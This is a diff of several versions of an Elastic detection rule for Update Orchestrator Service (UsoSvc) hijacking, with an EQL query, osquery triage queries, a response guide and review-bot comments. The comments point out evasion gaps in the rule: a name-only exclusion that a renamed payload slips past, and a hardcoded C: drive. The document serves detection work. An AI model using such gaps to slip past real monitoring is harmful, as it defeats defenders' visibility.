Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.executable : \"C:\\\\Windows\\\\System32\\\\svchost.exe\" and\n process.parent.args : \"UsoSvc\" and\n not process.executable :\n (\"?:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\UUS\\\\Packages\\\\*\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\UsoClient.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotification.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotificationUx.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotifyIcon.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerMgr.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\UsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\UsoCoreWorker.exe\",\n \"?:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeC2RClient.exe\") and\n not process.name : (\"MoUsoCoreWorker.exe\", \"OfficeC2RClient.exe\")\n", "references": [ "https://github.com/irsl/CVE-2020-1313" 
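Review bot: The trailing `not process.name : ("MoUsoCoreWorker.exe", "OfficeC2RClient.exe")` clause in the query (context here, unchanged by the commit) excludes by file name alone, so a payload dropped anywhere as `MoUsoCoreWorker.exe` and launched under the UsoSvc `svchost.exe` is silently excluded, which is exactly the hijack the rule exists to catch, while the path-based exclusions above it already cover the legitimate locations. If Elastic Defend populates code-signature fields for these events, tie the name exclusion to a trusted Microsoft signature instead, e.g. `not (process.name : ("MoUsoCoreWorker.exe", "OfficeC2RClient.exe") and process.code_signature.trusted == true and process.code_signature.subject_name : "Microsoft *")`. Separately, `process.parent.executable : "C:\\Windows\\System32\\svchost.exe"` pins the drive letter while every exclusion uses `?:`, so hosts with Windows on another volume never match; `"?:\\Windows\\System32\\svchost.exe"` would be consistent. These files look like generated package artifacts, so the change presumably belongs in the upstream rule source.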
@@ -63,7 +63,7 @@
 ],
 "risk_score": 73,
 "rule_id": "265db8f5-fc73-4d0d-b434-6483b56372e2",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -77,7 +77,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_106.json b/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_106.json
index e9c9f2a48b8..1aedcc75baf 100644
--- a/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_106.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistence via Update Orchestrator Service Hijack", - "note": "## Triage and analysis\n\n### Investigating Persistence via Update Orchestrator Service Hijack\n\nWindows Update Orchestrator Service is a DCOM service used by other components to install Windows updates that are already downloaded. Windows Update Orchestrator Service was vulnerable to elevation of privileges (any user to local system) due to an improper authorization of the callers. The vulnerability affected the Windows 10 and Windows Server Core products. Fixed by Microsoft on Patch Tuesday June 2020.\n\nThis rule will detect uncommon processes spawned by `svchost.exe` with `UsoSvc` as the command line parameters. Attackers can leverage this technique to elevate privileges or maintain persistence.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Persistence via Update Orchestrator Service Hijack\n\nWindows Update Orchestrator Service is a DCOM service used by other components to install Windows updates that are already downloaded. Windows Update Orchestrator Service was vulnerable to elevation of privileges (any user to local system) due to an improper authorization of the callers. The vulnerability affected the Windows 10 and Windows Server Core products. Fixed by Microsoft on Patch Tuesday June 2020.\n\nThis rule will detect uncommon processes spawned by `svchost.exe` with `UsoSvc` as the command line parameters. Attackers can leverage this technique to elevate privileges or maintain persistence.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.executable : \"C:\\\\Windows\\\\System32\\\\svchost.exe\" and\n process.parent.args : \"UsoSvc\" and\n not process.executable :\n (\"?:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\UUS\\\\Packages\\\\*\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\UsoClient.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotification.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotificationUx.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotifyIcon.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerMgr.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\UsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\UsoCoreWorker.exe\",\n \"?:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeC2RClient.exe\") and\n not process.name : (\"MoUsoCoreWorker.exe\", \"OfficeC2RClient.exe\")\n", "references": [ "https://github.com/irsl/CVE-2020-1313" 
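Review bot: The investigation guide on the `+ "note"` line tells the analyst to look for 4624 logon events "after the registry modification", but this rule's `query` matches a process start whose parent is `svchost.exe` with `UsoSvc` in its arguments and involves no registry key, so the sentence reads as carried over from a registry-based guide; it should say `Analysts can do this by searching for login events (for example, 4624) to the target host after the suspicious process start.` The same text appears in the 265db8f5-…_107.json hunk and in the _108.json hunk that runs past the end of this chunk, and since the commit only unescapes `\u003e` to `>` here, the wording fix presumably belongs in the upstream rule source these JSON files are generated from. Separately, on the unchanged `query` line the trailing `not process.name : ("MoUsoCoreWorker.exe", "OfficeC2RClient.exe")` clause excludes by file name alone, which makes the path-based allowlist just above it moot for those two names; pairing that clause with a code-signature condition (for example `process.code_signature.trusted == true`) would keep the exclusion without the gap. The enclosing JSON object opens and closes outside the hunk.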
@@ -63,7 +63,7 @@
 ],
 "risk_score": 73,
 "rule_id": "265db8f5-fc73-4d0d-b434-6483b56372e2",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -76,7 +76,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_107.json b/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_107.json
index 59b70f4c062..4a25cc003e8 100644
--- a/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_107.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistence via Update Orchestrator Service Hijack", - "note": "## Triage and analysis\n\n### Investigating Persistence via Update Orchestrator Service Hijack\n\nWindows Update Orchestrator Service is a DCOM service used by other components to install Windows updates that are already downloaded. Windows Update Orchestrator Service was vulnerable to elevation of privileges (any user to local system) due to an improper authorization of the callers. The vulnerability affected the Windows 10 and Windows Server Core products. Fixed by Microsoft on Patch Tuesday June 2020.\n\nThis rule will detect uncommon processes spawned by `svchost.exe` with `UsoSvc` as the command line parameters. Attackers can leverage this technique to elevate privileges or maintain persistence.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Persistence via Update Orchestrator Service Hijack\n\nWindows Update Orchestrator Service is a DCOM service used by other components to install Windows updates that are already downloaded. Windows Update Orchestrator Service was vulnerable to elevation of privileges (any user to local system) due to an improper authorization of the callers. The vulnerability affected the Windows 10 and Windows Server Core products. Fixed by Microsoft on Patch Tuesday June 2020.\n\nThis rule will detect uncommon processes spawned by `svchost.exe` with `UsoSvc` as the command line parameters. Attackers can leverage this technique to elevate privileges or maintain persistence.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.executable : \"C:\\\\Windows\\\\System32\\\\svchost.exe\" and\n process.parent.args : \"UsoSvc\" and\n not process.executable :\n (\"?:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\UUS\\\\Packages\\\\*\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\UsoClient.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotification.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotificationUx.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotifyIcon.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerMgr.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\UsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\UsoCoreWorker.exe\",\n \"?:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeC2RClient.exe\") and\n not process.name : (\"MoUsoCoreWorker.exe\", \"OfficeC2RClient.exe\")\n", "references": [ "https://github.com/irsl/CVE-2020-1313" 
@@ -63,7 +63,7 @@
 ],
 "risk_score": 73,
 "rule_id": "265db8f5-fc73-4d0d-b434-6483b56372e2",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -77,7 +77,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_108.json b/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_108.json
index 668020c5f1a..48dc62537f8 100644
--- a/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/265db8f5-fc73-4d0d-b434-6483b56372e2_108.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistence via Update Orchestrator Service Hijack", - "note": "## Triage and analysis\n\n### Investigating Persistence via Update Orchestrator Service Hijack\n\nWindows Update Orchestrator Service is a DCOM service used by other components to install Windows updates that are already downloaded. Windows Update Orchestrator Service was vulnerable to elevation of privileges (any user to local system) due to an improper authorization of the callers. The vulnerability affected the Windows 10 and Windows Server Core products. Fixed by Microsoft on Patch Tuesday June 2020.\n\nThis rule will detect uncommon processes spawned by `svchost.exe` with `UsoSvc` as the command line parameters. Attackers can leverage this technique to elevate privileges or maintain persistence.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
